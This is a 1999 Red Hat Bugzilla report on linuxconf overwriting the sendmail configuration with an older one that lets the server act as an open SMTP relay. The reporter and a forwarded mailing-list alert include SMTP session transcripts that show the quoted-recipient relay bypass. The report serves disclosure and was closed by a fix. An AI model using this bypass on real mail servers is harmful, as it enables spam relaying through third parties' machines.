Note: This is a beta release of Red Hat Bugzilla 5.0. The data contained within is a snapshot of the live data so any changes you make will not be reflected in the production Bugzilla. Also email is disabled so feel free to test any aspect of the site that you want. File any problems you find or give feedback here.

Bug 4648

Summary: linuxconf and "special domain routing" creates an open SMTP relay
Product: [Retired] Red Hat Linux Reporter: tom
Component: linuxconfAssignee: Michael K. Johnson <johnsonm>
Status: CLOSED ERRATA QA Contact:
Severity: medium Docs Contact:
Priority: high    
Version: 6.0CC: jack, terry
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: i386   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 1999-12-15 20:57:16 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:

Description tom 1999-08-22 07:20:00 UTC
If you use the "special domain routing" feature in Linuxconf
it replaces the version 8.9.3 sendmail.cf with a version
8.8.7 sendmail.cf (bug id #2480). This is bad as the
anti-relay rules in 8.8.7 are weaker. This also means that
exposed RH6 machines with special domain routing now fail
anti-relay tests (eg ORBS, MAPS etc) and can become black
listed.

Here's a sample of defeating the 8.8.7 relay rules:

220 ns2.xxx.com.au ESMTP Sendmail 8.9.3/8.8.7; Sun, 22 Aug
1999 15:38:58 +1000
mail from: <tom@oz.tm>
250 <tom@oz.tm>... Sender ok
rcpt to: <"tom@interact.net.au"@xxx.com.au>
250 <"tom@interact.net.au"@xxx.com.au>... Recipient ok
data
354 Enter mail, end with "." on a line by itself
testing
123
.
250 PAA06431 Message accepted for delivery
quit

Here's the stock RH6 8.9.3 cf running which defeats this
attempt:

220 ns2.xxx.com.au ESMTP Sendmail 8.9.3/8.9.3; Sun, 22 Aug
1999 15:59:50 +1000
mail from: <tom@oz.tm>
250 <tom@oz.tm>... Sender ok
rcpt to: <"tom@interact.net.au"@xxx.com.au>
550 <"tom@interact.net.au"@xxx.com.au>... Relaying denied

Comment 1 tom 1999-08-22 07:33:59 UTC
This is actually a bug in the linuxconf component, not the sendmail
one. This also happens even with the updated linuxconf RPM:
linuxconf-1.16r1.3-1

Comment 2 Michael K. Johnson 1999-09-19 22:42:59 UTC
Added Jacques to CC list

Comment 3 Michael K. Johnson 1999-09-19 23:05:59 UTC
*** Bug 4719 has been marked as a duplicate of this bug. ***

The following alert appeared on the Oz-ISP mailing list.

It appears that Linuxconf over-writes the Sendmail-8.9 conf
files
with Sendmail 8.8.x config.  It appears that Sendmail-8.8
still has
some serious bugs in prevent spam as indicated in the
following mail
message extract.

Is anyone looking at this problem ?
------------------------------------------------------------
---------------

For those people still using sendmail 8.8.x in hostile
environments,
note that your anti-relaying is very likely to be
compromised. ORBS
and
RRS are listing 8.8.x as open relays (as they are relaying)
because
of this.

Here's an example of poor.victim.com.au relaying spam to
tom@oz.tm:

220 poor.victim.com.au ESMTP Sendmail 8.8.5/8.8.5; Wed, 25
Aug 1999
09:55:39 +1000 (EST)
mail from: &#60;lkjfe@netscape.net>
250 &#60;lkjfe@netscape.net>... Sender ok
rcpt to: &#60;"tom@oz.tm"@victim.com.au>
250 &#60;"tom@oz.tm"@victim.com.au>... Recipient ok
data
[... insert porn spam here ..]

------------------------------------------------------------
---------------

Given the popularity of RedHat 6 and Linuxconf with ISPs
who are a
little short on Unix, inparticular Sendmail skills.  This
could be a
major problem.

Regards


Terry O'Connor

Comment 4 Michael K. Johnson 1999-12-02 17:33:59 UTC
linuxconf has defaulted to allowing relaying but that is being changed
now.  We will release linuxconf-1.16r10-1 or later after some testing
and that will have relaying turned off by default.

Comment 5 Michael K. Johnson 1999-12-15 20:57:59 UTC
1.16r10-2 released